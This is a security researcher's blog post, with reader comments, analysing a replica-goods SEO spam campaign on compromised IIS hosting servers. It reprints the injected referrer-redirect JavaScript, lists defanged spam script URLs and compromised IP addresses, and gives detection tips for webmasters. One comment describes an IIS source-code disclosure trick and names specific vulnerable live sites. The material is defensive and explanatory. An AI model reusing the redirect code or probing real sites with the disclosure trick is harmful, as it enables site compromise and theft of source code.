IIS, Compromised GoDaddy Servers, and Cyber Monday Spam

While doing an analysis of one black-hat SEO doorway on a hacked site, I noticed that it linked to many similar doorways on other websites, and all those websites were on IIS servers. When I see these patterns, I try to dig deeper and figure out what else those websites have in common. This time I revealed quite a few GoDaddy Windows servers have been pwned by “replica spam” hackers.

Let’s Dig Into Some Numbers

1,782 Domains. I collected 1,782 unique compromised domains that hackers use in this campaign. This list is just a tip of an iceberg and I’ll show why a bit later, so read on.

305 IP Addresses. Those websites are scattered across 305 unique IP addresses (actually 304, if we ignore four domains whose addresses I couldn’t resolve). This means roughly 6 websites per IP, however they are not evenly distributed and while many IPs only have one compromised site, some of the servers have hundreds of them.

Top networks:

  • GoDaddy: 95 hosts (31%) and 1,095 websites ( 61%. )
  • Brinkster: 50 hosts (16%) and 258 websites (14%)
  • Network Solutions: 27 hosts (9%) and 77 websites (4%)
  • Versaweb LLC: 5 hosts (1.6%) and 88 websites (5%)

As you can see, 84% of all websites belong to 4 networks.

Let’s look closer at servers on these networks, but before we do it I’ll show how I find compromised websites.

Cyber Monday Spam

The spam campaign I’m investigating is promoting online stores that sell cheap “replicas” of popular luxury brands like Beats by Dre, Michael Kors, Lululemon, Uggs, Juicy Couture, Moncler, Ray Ban, etc. Most of the doorways are currently optimized for Black Friday and Cyber Monday deals. The typical anchor text they use in their links is something like “michael kors cyber monday” or “uggs black friday“.

These spammy links point to the homepage of compromised websites, which typically have a block of hidden links at the bottom of HTML code:

<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;"> ... 
30-400 spammy links here ... 
</div>

If the website is vulnerable enough, hackers will install a script that generates completely new spammy pages specifically for search engines and return normal pages for human visitors — cloaking. The “human” versions of the pages have a small script at the very top of the HTML (usually before the tag) that redirects web searchers to spammy sites. It either something like this:

<script>
var s=document.referrer;
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0)
{
self.location='hxxp://www .jackets pretty .com'; //just one of many domains they use
}</script>

or a similar script, loaded from the spammers’ own server:

<script src="hxxp://nofie.talkmes . com/c/nofie.js" type="text/javascript"></script>

At this point they use the following script URLs:

hxxp://bats . solorule . com/d/bats.js
hxxp://bats . solorule . com/c/bats.js
hxxp://cancher . iamsanver . com/a/cancher.js
hxxp://cancher . letgopub . com/c/cancher.js
hxxp://cancher . sanonsport . com/d/cancher.js
hxxp://luover . unbangs . com/c/luover.js
hxxp://meika . ruvipshop . com/a/meika.js
hxxp://meika . sportruns . com/d/meika.js
hxxp://meika . ruvipshop . com/a/meika.js
hxxp://meika . ukingfans . com/c/meika.js
hxxp://nofie . godalice . com/d/cagode.js
hxxp://nofie . godalice . com/kspe.js
hxxp://nofie . rockenice . com/a/cagode.js
hxxp://nofie . rockenice . com/a/nofie.js
hxxp://nofie . talkmes . com/c/nofie.js
hxxp://ungogo . godleders . com/a/ungogo.js
hxxp://ungogo . leftgod . com/c/ungogo.js
hxxp://ungogo . leftgod . com/c/ungogo.js
hxxp://ungogo . nightleder . com/d/ungogo.js
hxxp://js . xufengonline . com/js/zong.js
hxxp://www . monclerslocker . com/js/style.js

Most of them are on the 173.252.207.166 IP (Take 2 Hosting Inc).

Detection

Any of these variants are easily detected by both Sucuri SiteCheck and Unmask Parasites, so it’s not a problem to check websites and tell whether they are infected or not.

Now that we know how to detect the infection, let’s just test random websites on some of the IPs that have many infected websites (based on my doorway analysis).

For example, let’s take 184.168.152.150 (where I found 25 doorways) and use the Bing’s “ip:” search operator along with the “cyber monday” keyword to find websites on that server: http://www.bing.com/search?q=ip%3A184.168.152.150+cyber+monday. Now you can scan websites for results that point to home pages (/ or index.html). More than 70% of the websites I checked are still infected (the rest either won’t load or have been cleaned already).

Bing Cyber Monday Results

Compromised Servers

This simple Bing search revealed hundreds of infected websites on that server. I observed the same results for 49 out of 95 GoDaddy servers from my list.

184.168.152.149
184.168.152.150
184.168.152.151
184.168.152.3
184.168.27.116
184.168.27.204
184.168.27.205
184.168.27.206
184.168.27.32
184.168.27.33
184.168.27.34
184.168.27.35
184.168.27.36
184.168.27.37
184.168.27.39
184.168.27.40
184.168.27.41
184.168.27.44
184.168.27.46
184.168.27.47
184.168.27.81
184.168.27.82
184.168.27.83
184.168.46.17
184.168.46.18
184.168.46.74
50.63.196.33
50.63.196.34
50.63.196.35
50.63.196.47
50.63.197.10
50.63.197.12
50.63.197.13
50.63.197.139
50.63.197.140
50.63.197.141
50.63.197.142
50.63.197.144
50.63.197.145
50.63.197.203
50.63.197.206
50.63.197.207
50.63.197.208
50.63.197.6
50.63.197.7
50.63.197.8
50.63.197.9
50.63.202.26
97.74.215.156

Those 49 servers are shared Windows servers with thousands of sites. For example, Domaintools.com says 2,050 sites use the 184.168.152.150 address. The websites I checked belong to different users so it’s not just a matter of individual compromised accounts. And the websites are quite heterogeneous – ASP, PHP, pure HTML, etc. so it doesn’t look like a common web application vulnerability either. It looks like those servers have been pwned by hackers who now have access to most user accounts there. Given that we have almost 50 known such Windows servers on the GoDaddy network, this may mean some infrastructure level problems or at least common Windows server security configuration issues.

The rest of the servers typically have one or very few websites (I suppose either dedicated servers or IPs) so they don’t affect this hypothesis.

Some of the Brinkster and Versaweb servers also have this issue:

65.182.100.172
65.182.100.177
65.182.100.186
65.182.100.191
65.182.100.88
65.182.101.106
65.182.101.150
65.182.101.152
65.182.101.206
65.182.101.207
65.182.101.41
65.182.101.60

76.164.226.242
76.164.226.243
76.164.226.244
76.164.226.245
76.164.226.246

It’s still not clear why all websites on those servers have not been infected (or have they been cleaned already?). Maybe hackers infected them semi-manually, so just a few hundred infected websites was good enough for them?

When checking random websites on the compromised servers I noticed that some of them used very old versions of CMS’s (e.g. 4 year old WordPress). Maybe such websites were the penetration points that helped hackers compromise the whole servers later?

I also know that hackers install PHP wrapper scripts on pure HTML sites. For example, it’s typical to see a default.php working instead of index.html when you request a homepage. This wrapper script explains why you see the injected script at the very top of the HTML code and how hackers manage to implement “cloaking” on pure HTML sites.

At this point, I can only see the following things in common on the servers used in this spam campaign:

  • Windows
  • IIS (usually an old version)
  • PHP support

I wonder if this combination has a known security hole that allows to pwn server?

To Webmasters

This time I’d like to reach out to webmasters who host their websites on shared Windows servers. Especially to GoDaddy clients.

Please Check Your Websites ASAP!

You can start with free online scanners like Sucuri SiteCheck and Unmask Parasites,

Then check search results for your website on Google (the “site:” operator), where you should look for unexpected keywords in your page titles and descriptions. Make sure to check “cached” copies that Google store for your site. Then add the following keywords to your “site:” search that may help your spot more web spam:

  • site:yourdomain.com cheap
  • site:yourdomain.com buy online
  • site:yourdomain.com “cyber monday”
  • site:yourdomain.com “black friday”
  • site:yourdomain.com outlet

Then you might want to figure out if your server looks compromised. First, identify your website’s IP address. You can use commands like ping or host, you can enter your domain name on a website like whois.domaintools.com, or you can at least ask your hosting provider. With your IP, you can then use the Bing‘s “ip:” search along with some spammy keywords.

Here are a few searches that I suggest you can try:

ip:ip address cyber monday
ip:ip address black friday
ip:ip address ”beat by dre cheap”
ip:ip address ”Cheap Louis Vuitton”
ip:ip address viagra online
ip:ip address payday loans
ip:ip address “order cialis online”

If you see many results from different websites, you might want to ask your hosting provider what’s going on there, and if the server is really secure.

We are currently contacting hosting providers so they can address this issue…

33 comments
    1. The company I work for has hundreds of clients, this week the reports have been rolling in, we’ve confirmed12 sites have been hacked in the exact manner discussed here. All 12 sites are hosted on GoDaddy shared “windows” servers. On all 12 sites we found at least one weird .asp file, usually saved in an odd directory to obviously go unnoticed, but saved in Sept 2014. So something happened back in Sept, and the hackers are just now exploiting it.

        1. Here is the code in the file:

          the filenames are never the same, this one was named “tcTycZgooZa.asp” and was hidden in an images directory

          1. ASP backdoor. Haven’t seen a true IIS backdoor in ages… But be careful, when NTFS file permissions are set wrong and / or application pools run under a privileged user (like NETWORK SERVICE), then this could and will compromise your entire server!

          2. Yes very true, but since this is on a shared hosting plan with go daddy and it has affected many, I am concerned , but keep in mind that the ability to control the pools and service accounts are locked down by the provider.

          3. Ok another thing to consider….. (My Background: I have done many hours researching this because I take it personally when I have been hacked and no one seems to know why.) Just for kicks go visit http://narratavius.com Notice anything odd? Why would a new domain have been hacked? FTP? ASP? IIS? and why would it be infecting IIS shared hosting plans by the masses? I had two completely separate accounts, both windows share hosting plans get hit with this.

      1. I noticed a odd asp file as well. It was a time stamp code perhaps gathering information that the hosted site/server was on the vulnerable list. It was dated a couple weeks before the actual HTML files were modified with linkspam

  1. Was IIS compromised, or websites on IIS?

    IP addresses report different versions of IIS: 6.0(!), 7.0, 7.5. The Versaweb IP’s report to be running nginx with an ancient PHP 5.2. For as far as server response headers are reliable of course.

    1. It’s not clear what exactly was compromised. But I can see that this campaign targets only sites on IIS servers. And on some of them, a significant number of unrelated sites are hacked.

      Good catch on the Versaweb. Indeed, nginx. But it looks like all the sites there have been specifically built for this blackl-hat SEO campaign. For example, check this siteL lalenguafanzine.com. Only the hope page with all navigation links broken. And those links point to .aspx(!!!) pages. So it looks like they copied a template of some legitimate site and filled it with spammy content.

      The same applies to the rest sites on the Versaweb IPs. Another, quite meaningfull domain: http://www.daytonbowenworks.com – again spammy homepage and broken .aspx pages. This site is definitely has been copied from hxxp://humanfactoranalytics .com/, which is hosted on 184.168.152.151 – GoDaddy – you can find it in my list of the GoDaddy IPs in this article.

      1. Hmm, the first two sites in your Bing result page (bhnetug [.] org, latetermabortion [.] net, hosted on the IP address 184.168.152.150 are vulnerable to a source code disclosure vulnerability in IIS. This one is waayy old: http://www.saotn.org/multiple-iis-60-75-vulnerabilities/ , http://seclists.org/fulldisclosure/2012/Jun/189.

        For example on latetermabortion [.] net, add /default.asp/.php to the URL to view the source code. I can only imagine the IIS configuration is so wrong it’s vulnerable for many more vulnerabilities. For all you know the application pools run under the same identity (not “applicationpool identity”) and one website breach can mass deface all others.

        From the looks of it, bhnetug [.] org runs an old version of DotNetNuke, and see /default.aspx/.php.

        Edit: Denis, do you – or does Sucuri – have a security contact with GoDaddy on this matter? The .NET source code disclosure vulnerability (2,5 years old…) needs to be patched.

      2. So far I only see IIS 7.0 being affected. What is interesting is searching for key code words used by the linkspam I found some similar attempts earlier this year with same key words without the black friday etc etc.

  2. We had a client last week with this problem. We don’t control his hosting but by the time anyone noticed it, someone, maybe his webhost Godaddy, had already corrected it. He’s hosted on a IIS server.

  3. I experienced this back in mid October, not the same time frame but everything else matches. I spent ages on hold with GoDaddy tech support trying to get access to the logs to try to figure out how they got in. When the tech came back on the line he was evasive and the only thing I could get out of him was that it was fixed. Hung up after learning nothing but with a strong suspicion that the issue was definitely on their end. No problems since.

    1. Similar GoDaddy story here. But then listen to this, we downloaded our client’s web logs for the past month. The IIS log for the date the files were modified is conspicuously missing. The log for the day before and day after are there, but for the day we believe the breach occurred there is no log file.
      And then when our client called GoDaddy to report the breach, the GoDaddy rep. made some unexpected comments to my client… basically insinuating that since I contacted the client before the client knew they were breached, that maybe I had something to do with it.

  4. So far I have a this response from GoDaddy:

    “We review and investigate every report and will take immediate action to stop such activities.

    Due to the large amount of sites you have reported this may take some time to fully resolve but we will do so as swiftly as possible.”

    But I’m planning to contact them again – I found a few more similarly compromised servers.

    1. One of my sites I just noticed got hacked on 11-27-14 again adding more SEO spam to what was already there. Interestingly it did not effect my other hosting account. I left this infected account alone waiting for someone to look into it. If you want access to this account (untouched for forensics) your are more than welcome to have at it to see the hack. Please contact me at chris.wendi(at)gmail(dot)com

  5. Really good catch on the “source code disclosure” vulnerability. This made my investigation a bit more fruitful since I can now see server-side malicious code.

    And I checked a few other GoDaddy servers and they are vulnerable too. On the other hand, Brinkster servers are not vulnerable

  6. YES! I think your on to something! I too believe this is a IIS vulnerability hack, Interestingly earlier this year mid summer I found a Iranian hacker (via google keyword code searches) defacing webistes, one of the footprint CSS style codes used in this SEO spam hack was also ironically on the hacked site they defaced.

  7. My website is still affected by this, as of now, 12/15/14. It is on one of the servers you list in the article – 184.168.46.17 My website forwards to an UGGS boot spam site. But only the home page, and only when accessed through a search engine (Google, Bing, and Yahoo). I have called GoDaddy support twice about this, and they say they can’t see the problem, and that they have checked the server multiple times, and that everything is fine. But the problem persists, and I have confirmed with several friends in different parts of the country, and they are directed to the UGGS spam site as well. I do not know what to do, because GoDaddy will not acknowledge it. I have directed them to this very article, but they say that they don’t know what I am talking about.

    1. That is is the very reason I have got involved online. They want to sell me a Site monitoring service instead of addressing the real issue.

  8. I have a site on brinkster that recently suffered with this issue (for the second time in 6 months).
    The site is .asp and is on 65.182.100.192.

    Thanks to this article and the comments I found that if I add /.php to the urls I can view the source code of my site (Microsoft IIS 7.5 .NET source code disclosure and authentication bypass)

    The brinkster control panel for shared hosting does not allow configuration of IIS. You also cannot disable FTP
    The fix I used for the view source issue was to add a web.config file with

  9. What fun,. i find the virus on all of my sites today, a quick search and i find mt ip in your list above. Thanks for the update. Only bright side is my sites get next to no traffic so the hackers gained nothing.
    No to start fixing

  10. Hacked two of my websites. WHAT I WANT TO KNOW…yes yelling at you NetWorkSolutions is why it took WebMaster tools at Google to see it roughly two weeks after it happened, and you never had a clue. I only found out after google crawled my site. Have three service calls to NWS and not even a reply. Please add the redirect spam site hxxp://www.bestjordanslocker.com/ . Looks like my email to GoDaddy (hosting site for offending website and registrar) did not go unnoticed for long. However, still quite a few websites infected if you search for “feets.asp?id=95” . The offending redirect. I am thrilled to have found this site. Thank you so much Denis for posting your report!!! Booked marked for reading. Thanks, Greg

  11. Hacked two of my websites. WHAT I WANT TO KNOW…yes yelling at you NetWorkSolutions is why it took WebMaster tools at Google to see it roughly two weeks after it happened, and you never had a clue. I only found out after google crawled my site. Have three service calls to NWS and not even a reply. Please add the redirect spam site hxxp://www.bestjordanslocker.c… . Looks like my email to GoDaddy (hosting site for offending website and registrar) did not go unnoticed for long. However, still quite a few websites infected if you search for “feets.asp?id=95” . The offending redirect. I am thrilled to have found this site. Thank you so much Denis for posting your report!!! Booked marked for reading. Thanks, Greg

  12. Thank you! I’ve been contacting Go Daddy about this since November. I keep uploading new pages, which become infected with the code quickly. Go Daddy isn’t doing anything even though I inform them of my issue. Armed with this information–all of which applies to my problems–I will go back to them and demand they clean up my server. Thank you for doing this for all of us!

  13. My Godaddy share hosting IIS ASP site was hacked on December 8. I happened to notice it on December 16, when I went in to update one of my pages. Called Godaddy, and their view of the situation was “YOUR SITE was hacked,” not “OUR SERVER was hacked,” and their proposed solution was to insinuate that my web monkey was likely at fault, and to try to sell me SiteLock monitoring service. I cleaned the crap out (it was exactly the sort of thing you describe here), and am checking things regularly to see if it returns (hasn’t so far).

    Not that happy with Godaddy’s “we fail to keep things up to date, and then charge you for a monitoring service when, inevitably, our servers get hacked” business model.

  14. I’ve noticed an increasing number of WordPress brute force attacks in the last two months coming from Godaddy, Rackspace, Leaseweb and other legit hosting addresses (and not from the usual zombie pc-s). Is this connected to this security issue or there is an other pwning campaign going on?

Comments are closed.

You May Also Like